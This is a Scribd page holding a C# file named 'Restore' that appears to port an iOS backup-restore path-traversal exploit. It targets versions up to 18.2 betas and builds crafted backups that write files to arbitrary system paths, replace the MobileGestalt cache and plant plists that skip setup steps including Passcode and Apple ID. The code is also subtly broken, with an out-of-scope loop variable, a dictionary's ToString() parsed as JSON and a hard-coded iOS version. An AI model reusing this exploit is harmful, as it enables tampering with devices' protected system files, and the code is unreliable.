Scribd
Upload
59 views5 pages

Restore

Uploaded by

xeushalemaker
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
59 views5 pages

Restore

Uploaded by

xeushalemaker
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 5

using System;

using System.Collections.Generic;
using System.IO;
using System.Text;
using System.Runtime.Serialization;
using System.Xml.Serialization;

public enum PathTraversalCapability


{
Unsupported = 0, // 18.2b3+, 17.7.2
DotOnly, // 18.1b5-18.2b2, 17.7.1
DotAndSlashes // up to 18.1b4, 17.7
}

public class FileToRestore


{
public byte[] Contents { get; set; }
public string To { get; set; }
public int Owner { get; set; }
public int Group { get; set; }

public FileToRestore(string from, string to, int owner = 0, int group = 0)


{
Contents = File.ReadAllBytes(from);
To = to;
Owner = owner;
Group = group;
}

public FileToRestore(byte[] contents, string to, int owner = 0, int group = 0)


{
Contents = contents;
To = to;
Owner = owner;
Group = group;
}
}

[Serializable]
public class AnyCodable
{
public object Value { get; set; }

public AnyCodable(object value)


{
Value = value;
}

public AnyCodable() { }

public static AnyCodable FromJson(string json)


{
var serializer = new JsonSerializer();
return serializer.Deserialize<AnyCodable>(new JsonTextReader(new
StringReader(json)));
}

public string ToJson()


{
var serializer = new JsonSerializer();
var sb = new StringBuilder();
var writer = new StringWriter(sb);
serializer.Serialize(writer, this);
return sb.ToString();
}
}

public class Backup


{
public List<BackupFile> Files { get; set; }

public Backup(List<BackupFile> files)


{
Files = files;
}
}

public abstract class BackupFile


{
public string Path { get; set; }
public string Domain { get; set; }
public int Owner { get; set; }
public int Group { get; set; }

public BackupFile(string path, string domain, int owner = 0, int group = 0)


{
Path = path;
Domain = domain;
Owner = owner;
Group = group;
}
}

public class Directory : BackupFile


{
public Directory(string path, string domain, int owner = 0, int group = 0)
: base(path, domain, owner, group)
{
}
}

public class ConcreteFile : BackupFile


{
public byte[] Contents { get; set; }
public long Inode { get; set; }

public ConcreteFile(string path, string domain, byte[] contents, int owner = 0,


int group = 0, long inode = 0)
: base(path, domain, owner, group)
{
Contents = contents;
Inode = inode;
}
}

public static class Restore


{
public static PathTraversalCapability SupportedExploitLevel()
{
// Adapte la version iOS
var iosVersion = "18.1"; // Exemple, à obtenir selon le système
if (double.TryParse(iosVersion, out double version) && version >= 18.1)
{
return PathTraversalCapability.DotOnly;
}
return PathTraversalCapability.DotAndSlashes;
}

public static Backup CreateMobileGestalt(FileToRestore file)


{
var cloudConfigPlist = new Dictionary<string, object>
{
{ "SkipSetup", new[] { "WiFi", "Location", "Restore", "SIMSetup",
"Android", "AppleID", "IntendedUser", "TOS", "Siri", "ScreenTime", "Diagnostics",
"SoftwareUpdate", "Passcode", "Biometric", "Payment", "Zoom", "DisplayTone",
"MessagingActivationUsingPhoneNumber", "HomeButtonSensitivity", "CloudStorage",
"ScreenSaver", "TapToSetup", "Keyboard", "PreferredLanguage", "SpokenLanguage",
"WatchMigration", "OnBoarding", "TVProviderSignIn", "TVHomeScreenSync", "Privacy",
"TVRoom", "iMessageAndFaceTime", "AppStore", "Safety", "Multitasking",
"ActionButton", "TermsOfAddress", "AccessibilityAppearance", "Welcome",
"Appearance", "RestoreCompleted", "UpdateCompleted" }},
{ "AllowPairing", true },
{ "ConfigurationWasApplied", true },
{ "CloudConfigurationUIComplete", true },
{ "ConfigurationSource", 0 },
{ "PostSetupProfileWasInstalled", true },
{ "IsSupervised", false }
};

var purplebuddyPlist = new Dictionary<string, object>


{
{ "SetupDone", true },
{ "SetupFinishedAllSteps", true },
{ "UserChoseLanguage", true }
};

return new Backup(new List<BackupFile>


{
// MobileGestalt
new Directory("SysSharedContainerDomain-
systemgroup.com.apple.mobilegestaltcache", "RootDomain"),
new Directory("systemgroup.com.apple.mobilegestaltcache/Library",
"SysSharedContainerDomain-"),
new
Directory("systemgroup.com.apple.mobilegestaltcache/Library/Caches",
"SysSharedContainerDomain-"),
new
ConcreteFile("systemgroup.com.apple.mobilegestaltcache/Library/Caches/
com.apple.MobileGestalt.plist", "SysSharedContainerDomain-", file.Contents,
file.Owner, file.Group),
// Skip setup
new Directory("SysSharedContainerDomain-
systemgroup.com.apple.configurationprofiles", "RootDomain"),
new Directory("systemgroup.com.apple.configurationprofiles/Library",
"SysSharedContainerDomain-"),
new
Directory("systemgroup.com.apple.configurationprofiles/Library/ConfigurationProfile
s", "SysSharedContainerDomain-"),
new ConcreteFile("systemgroup.com.apple.configurationprofiles/Library/
ConfigurationProfiles/CloudConfigurationDetails.plist",
"SysSharedContainerDomain-",
Encoding.UTF8.GetBytes(AnyCodable.FromJson(cloudConfigPlist.ToString()).ToJson()),
501, 501),
new ConcreteFile("mobile/com.apple.purplebuddy.plist",
"ManagedPreferencesDomain",
Encoding.UTF8.GetBytes(AnyCodable.FromJson(purplebuddyPlist.ToString()).ToJson()),
501, 501)
});
}

public static Backup CreateBackupFiles(List<FileToRestore> files)


{
var filesList = new List<BackupFile>
{
new Directory("", "RootDomain"),
new Directory("Library", "RootDomain"),
new Directory("Library/Preferences", "RootDomain")
};

for (int i = 0; i < files.Count; i++)


{
var file = files[i];
filesList.Add(new ConcreteFile($"Library/Preferences/temp{i}",
"RootDomain", file.Contents, file.Owner, file.Group, i));
}

foreach (var file in files)


{
string restoreFilePath = file.To;
string basePath = "/var/backup";

if (restoreFilePath.StartsWith("/var/mobile/"))
{
basePath = "/var/mobile/backup";
}
else if (restoreFilePath.StartsWith("/private/var/mobile/"))
{
basePath = "/private/var/mobile/backup";
}
else if (restoreFilePath.StartsWith("/private/var/"))
{
basePath = "/private/var/backup";
}

string directoryPath = Path.Combine(basePath,


Path.GetDirectoryName(restoreFilePath));
string filePath = Path.Combine(basePath, restoreFilePath);

filesList.Add(new Directory(directoryPath, "SysContainerDomain-"));


filesList.Add(new ConcreteFile(filePath, "SysContainerDomain-", new
byte[0], file.Owner, file.Group, i));
}

// Add crash on purpose


filesList.Add(new ConcreteFile("/crash_on_purpose", "SysContainerDomain-",
new byte[0], 501, 501));
return new Backup(filesList);
}
}

You might also like